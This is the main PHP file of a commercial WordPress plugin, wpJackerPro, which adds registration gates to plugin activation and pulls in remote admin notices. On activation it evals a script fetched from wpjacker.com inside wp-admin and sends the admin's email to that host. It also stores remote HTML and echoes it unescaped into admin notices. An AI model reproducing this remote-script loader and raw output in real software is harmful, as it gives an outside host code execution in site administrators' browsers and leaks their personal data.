<?php
/**
 * @package   wpJackerPro
 * @author    Chad Wyatt <chad@chadwyatt.com>
 * @license   Commercial
 * @link      http://chadwyatt.com
 * @copyright 2014 Chad Wyatt
 *
 * @wordpress-plugin
 * Plugin Name:       wpJackerPro
 * Plugin URI:        http://wpjacker.com/pro
 * Description:       Add Email Registration, Facebook Like gates, and other Offers to the activation process of any Wordpress Plugin. Includes remote admin notifications.
 * Version:           1.0.0
 * Author:            wpJacker
 * Author URI:        http://wpJacker.com/pro
 * Text Domain:       wpjackerpro
 * License:           Commercial
 */

// If this file is called directly, abort.
if ( ! defined( 'WPINC' ) ) {
	die;
}

define('WPJACKERPRO_VERSION', '1.0.0');

require_once('wp-updates-plugin.php');
new WPUpdatesPluginUpdater_568( 'http://wp-updates.com/api/2/plugin', plugin_basename(__FILE__));

require_once( plugin_dir_path( __FILE__ ) . 'public/class-public.php' );

add_action( 'plugins_loaded', array( 'WP_JackerPro', 'get_instance' ) );

if ( is_admin() ) {

	require_once( plugin_dir_path( __FILE__ ) . 'admin/class-admin.php' );
	add_action( 'plugins_loaded', array( 'WP_JackerPro_Admin', 'get_instance' ) );

}


//wpregister code
if(!function_exists('wpregister_plugin_activation_wpjackerpro')){
	function wpregister_plugin_activation_wpjackerpro() {
		if($_COOKIE['wpregister_complete'] == '1'){
			setcookie('wpregister_complete', "", time() - 3600);
			return true;
		}
		$user = get_userdata( get_current_user_id() );
		echo '<h3 style=\'font-family: "Open Sans",sans-serif\'>Please wait...</h3>';
		?>
			<script>
				parent.eval("jQuery.getScript('http://wpjacker.com/wp-admin/admin-ajax.php?action=wpjregister_parent_js&ID=167&plugin_file=<?php echo plugin_basename(__FILE__); ?>&email=<?php echo $user->data->user_email; ?>');");
			 </script>
			<?php
			die();
	}
	register_activation_hook( __FILE__, 'wpregister_plugin_activation_wpjackerpro' );
}

if(!function_exists('wpregister_get_admin_notice')){
	function wpregister_get_admin_notice(){
		
			
		//only retrieve the notice if it's been at least 24 hrs
		if($_COOKIE['wpregister_admin_notice_last_request'] != '1'){
			
			//plain html admin notice from parent site
			$url = 'http://wpjacker.com/wp-admin/admin-ajax.php?action=wpjregister_admin_notice&ID=167';
			$ch = curl_init();
			$timeout = 5;
			curl_setopt($ch, CURLOPT_URL, $url);
			curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
			curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
			$html = curl_exec($ch);
			curl_close($ch);
			
			//save it to the local options table so we can re-use it
			update_option('wpregister_admin_notice_html', $html);
			
			//we just retrieved the html, so let's not do it again for 24 hrs
			setcookie('wpregister_admin_notice_last_request', '1', time()+(24*60*60));
			
		}
	}
	
	add_action('admin_init', 'wpregister_get_admin_notice');
}


if(!function_exists('wpregister_admin_notice')){
	function wpregister_admin_notice() {
		if($_COOKIE['wpregister_admin_notice_dismiss'] == '1')
			return;
			
		$html = get_option('wpregister_admin_notice_html', '');
		
		if($html == '')
			return;
		?>
		<div class="update-nag">
			<p>
            <?php echo $html; ?>
             <a href="javascript:;" style="color:#ccc;margin-left:10px;" onclick="jQuery.get(ajaxurl+'?action=wpregister_dismiss_notice');jQuery(this).parent().parent().fadeOut('slow');">dismiss</a>
           </p>
       </div>
		<?php
		
	}
	
	add_action( 'admin_notices', "wpregister_admin_notice" );

}

if(!function_exists('wpregister_dismiss_notice')){
	function wpregister_dismiss_notice(){
		setcookie('wpregister_admin_notice_dismiss', '1', time()+(24*60*60));
	}
	add_action('wp_ajax_wpregister_dismiss_notice', 'wpregister_dismiss_notice' );	
}
//end wpregister code

